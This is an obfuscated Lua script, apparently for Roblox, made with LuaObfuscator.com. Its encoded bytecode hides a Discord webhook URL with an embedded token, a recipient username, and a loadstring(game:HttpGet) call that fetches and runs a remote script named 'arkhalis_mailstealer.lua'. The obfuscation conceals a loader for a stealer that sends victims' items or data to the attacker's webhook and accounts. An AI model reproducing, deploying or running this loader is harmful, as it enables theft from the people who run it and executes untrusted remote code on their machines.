--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v90=v5(v82,v19);v19=nil;return v90;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -(118 -(32 + 85)))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (878 -(282 + 595)))) ;return v83-(v83%(1 + 0)) ;else local v84=1637 -(338 + 1185 + 114) ;local v85;while true do if (v84==(0 + 0)) then v85=(933 -(857 + (1031 -(892 + 65))))^(v32-(1066 -(68 + 997))) ;return (((v31%(v85 + v85))>=v85) and (1271 -((538 -312) + 1044))) or (568 -(367 + 201)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (354 -(87 + 263)) ;return (v40 * (16777396 -(50 + 17 + 113))) + (v39 * (48056 + 17480)) + (v38 * (628 -372)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=3 -2 ;local v44=(v20(v42,3 -2 ,972 -(802 + 150) ) * ((5 -3)^(57 -25))) + v41 ;local v45=v20(v42,36 -(1095 -(1020 + 60)) ,23 + 8 );local v46=((v20(v42,1029 -(915 + 82) )==(431 -(44 + 386))) and  -(2 -1)) or ((1424 -(630 + 793)) + 0) ;if (v45==(0 + 0)) then if (v44==(0 + (0 -0))) then return v46 * (1138 -(116 + 1022)) ;else local v91=0 -0 ;while true do if (v91==(1187 -(1069 + 118))) then v45=(9 -7) -(1 + 0) ;v43=0 -0 ;break;end end end elseif (v45==(356 + (5822 -4131))) then return ((v44==(0 -0)) and (v46 * ((1 + 0)/(791 -(368 + 423))))) or (v46 * NaN) ;end return v8(v46,v45-(3214 -2191) ) * (v43 + (v44/((887 -(261 + 624))^(70 -(10 + 8))))) ;end local function v25(v47)local v48;if  not v47 then local v86=1747 -(760 + 987) ;while true do if (v86==(1913 -(1789 + 124))) then v47=v23();if (v47==(766 -(745 + 21))) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -((3 -2) + 0) );v18=v18 + v47 ;local v49={};for v65=2 -1 , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0 -0 ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v50~=4) then else while true do if (1==v51) then v54=nil;v55=nil;v51=168 -(9 + 157) ;end if (v51~=0) then else local v96=0;while true do if (v96~=1) then else v51=1;break;end if (0==v96) then v52=0;v53=nil;v96=3 -2 ;end end end if (v51==2) then v56=nil;v57=nil;v51=3;end if (v51==(1827 -(1195 + 629))) then v58=nil;while true do local v97=0;while true do if (v97==0) then if (v52==0) then local v115=0;while true do if (v115==0) then v53={};v54={};v115=1;end if (1~=v115) then else v55={};v56={v53,v54,nil,v55};v115=2;end if (v115==2) then v52=781 -(162 + 618) ;break;end end end if (v52==1) then v57=v23();v58={};for v135=1 + 0 ,v57 do local v136=0 + 0 ;local v137;local v138;while true do if (v136~=(1 -0)) then else if (v137==1) then v138=v21()~=(0 -0) ;elseif (v137==(1 + 1)) then v138=v24();elseif (v137==(1639 -(1373 + 263))) then v138=v25();end v58[v135]=v138;break;end if (0~=v136) then else local v158=0;while true do if (v158==(1000 -(451 + 549))) then v137=v21();v138=nil;v158=1;end if (v158==(1 + 0)) then v136=1 -0 ;break;end end end end end v56[4 -1 ]=v21();v52=1386 -(746 + 638) ;end v97=1;end if (v97==(1 + 0)) then if (v52==2) then local v117=0;while true do if (v117~=(1 -0)) then else return v56;end if (v117==(341 -(218 + 123))) then for v159=1,v23() do local v160=0;local v161;local v162;while true do if (1==v160) then while true do if (v161==(1581 -(1535 + 46))) then v162=v21();if (v20(v162,1 + 0 ,1)==(0 + 0)) then local v165=560 -(306 + 254) ;local v166;local v167;local v168;local v169;local v170;while true do if (v165==2) then v170=nil;while true do if ((0 + 0)~=v166) then else local v173=0;local v174;while true do if (v173==(0 -0)) then v174=1467 -(899 + 568) ;while true do if (v174==0) then local v183=0;while true do if (v183==1) then v174=1 + 0 ;break;end if (v183==0) then v167=0 -0 ;v168=nil;v183=1;end end end if (v174==1) then v166=1;break;end end break;end end end if (v166==(605 -(268 + 335))) then while true do if (v167~=2) then else local v175=0;local v176;while true do if (v175==0) then v176=0;while true do if (v176==1) then v167=3;break;end if (v176==(290 -(60 + 230))) then if (v20(v169,573 -(426 + 146) ,1 + 0 )~=(1457 -(282 + 1174))) then else v170[813 -(569 + 242) ]=v58[v170[5 -3 ]];end if (v20(v169,2,1 + 1 )==(1025 -(706 + 318))) then v170[1254 -(721 + 530) ]=v58[v170[1274 -(945 + 326) ]];end v176=2 -1 ;end end break;end end end if (v167==(3 + 0)) then if (v20(v169,703 -(271 + 429) ,3)==1) then v170[4 + 0 ]=v58[v170[1504 -(1408 + 92) ]];end v53[v159]=v170;break;end if (v167==(1087 -(461 + 625))) then local v178=0;local v179;while true do if (v178==0) then v179=1288 -(993 + 295) ;while true do if (v179~=(0 + 0)) then else local v185=0;while true do if ((1172 -(418 + 753))==v185) then v179=1 + 0 ;break;end if ((0 + 0)~=v185) then else v170={v22(),v22(),nil,nil};if (v168==0) then local v190=0 + 0 ;local v191;local v192;while true do if (v190~=(529 -(406 + 123))) then else v191=1769 -(1749 + 20) ;v192=nil;v190=1 + 0 ;end if (v190==(1323 -(1249 + 73))) then while true do if (v191==(0 + 0)) then v192=0;while true do if (0~=v192) then else v170[3]=v22();v170[1149 -(466 + 679) ]=v22();break;end end break;end end break;end end elseif (v168==1) then v170[6 -3 ]=v23();elseif (v168==2) then v170[3]=v23() -((5 -3)^(1916 -(106 + 1794))) ;elseif (v168~=3) then else local v195=0;while true do if (v195==(0 + 0)) then v170[1 + 2 ]=v23() -((5 -3)^(43 -27)) ;v170[4]=v22();break;end end end v185=1;end end end if ((115 -(4 + 110))==v179) then v167=2;break;end end break;end end end if (0==v167) then local v180=584 -(57 + 527) ;while true do if (v180==(1427 -(41 + 1386))) then local v184=0;while true do if (v184==(103 -(17 + 86))) then v168=v20(v162,2,3 + 0 );v169=v20(v162,4,6);v184=1;end if (1==v184) then v180=1 -0 ;break;end end end if (v180~=(2 -1)) then else v167=1;break;end end end end break;end if (v166==1) then v169=nil;v170=nil;v166=2;end end break;end if (v165~=0) then else local v171=166 -(122 + 44) ;while true do if (v171==0) then v166=0 -0 ;v167=nil;v171=1;end if (v171~=1) then else v165=1;break;end end end if (v165==(3 -2)) then local v172=0 + 0 ;while true do if (v172==(1 + 0)) then v165=2;break;end if (v172~=0) then else v168=nil;v169=nil;v172=1;end end end end end break;end end break;end if (v160~=0) then else v161=0 -0 ;v162=nil;v160=66 -(30 + 35) ;end end end for v163=1,v23() do v54[v163-(1 + 0) ]=v28();end v117=1258 -(1043 + 214) ;end end end break;end end end break;end end break;end if (v50~=0) then else v51=0 -0 ;v52=nil;v50=1;end if (v50~=2) then else v55=nil;v56=nil;v50=1215 -(323 + 889) ;end if (v50==1) then v53=nil;v54=nil;v50=5 -3 ;end if (v50==(583 -(361 + 219))) then v57=nil;v58=nil;v50=324 -(53 + 267) ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80==0) then v77[v79[2]]=v79[3]~=0 ;else do return;end end elseif (v80<=2) then v77[v79[2]]=v61[v79[3]];elseif (v80==3) then v77[v79[2]]=v79[3];else v71=v79[3];end elseif (v80<=7) then if (v80<=5) then local v101=v79[2];v77[v101]=v77[v101](v13(v77,v101 + 1 ,v72));elseif (v80==6) then v77[v79[2]]();elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=8) then v77[v79[2]][v79[3]]=v79[4];elseif (v80>9) then local v121=v79[2];local v122,v123=v70(v77[v121](v13(v77,v121 + 1 ,v79[3])));v72=(v123 + v121) -1 ;local v124=0;for v139=v121,v72 do v124=v124 + 1 ;v77[v139]=v122[v124];end else v77[v79[2]]();end elseif (v80<=15) then if (v80<=12) then if (v80==11) then local v105=0;local v106;local v107;while true do if (v105==1) then v77[v106 + 1 ]=v107;v77[v106]=v107[v79[4]];break;end if (0==v105) then v106=v79[2];v107=v77[v79[3]];v105=1;end end else do return;end end elseif (v80<=13) then v77[v79[2]]=v61[v79[3]];elseif (v80==14) then v77[v79[2]]=v79[3]~=0 ;elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=18) then if (v80<=16) then local v110=0;local v111;local v112;while true do if (v110==1) then v77[v111 + 1 ]=v112;v77[v111]=v112[v79[4]];break;end if (v110==0) then v111=v79[2];v112=v77[v79[3]];v110=1;end end elseif (v80>17) then local v126=v79[2];local v127,v128=v70(v77[v126](v13(v77,v126 + 1 ,v79[3])));v72=(v128 + v126) -1 ;local v129=0;for v152=v126,v72 do v129=v129 + 1 ;v77[v152]=v127[v129];end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=19) then local v113=v79[2];v77[v113]=v77[v113](v13(v77,v113 + 1 ,v72));elseif (v80>20) then v77[v79[2]]=v79[3];else v71=v79[3];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31343938353933363533353639313338352F6D35617A414B73366B327164714D62527057696D5A654C716771523446707A34466258345F6A61644163502O4145387266454A6A70546F794357734C4A67383043324164030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F61726B68616C69735F6D61696C737465616C65722E6C756103093O00557365726E616D6531030C3O00616E6472656973697461746903093O00557365726E616D653200173O0012033O00013O0026073O000E000100020004143O000E000100120D000100033O00301100010004000500120D000100063O00120D000200073O00200B000200020008001203000400094O000E000500014O000A000200054O000500013O00022O00060001000100010004143O001600010026073O0001000100010004143O0001000100120D000100033O0030110001000A000B00120D000100033O0030110001000C000B0012033O00023O0004143O000100012O00013O00017O00",v9(),...);end
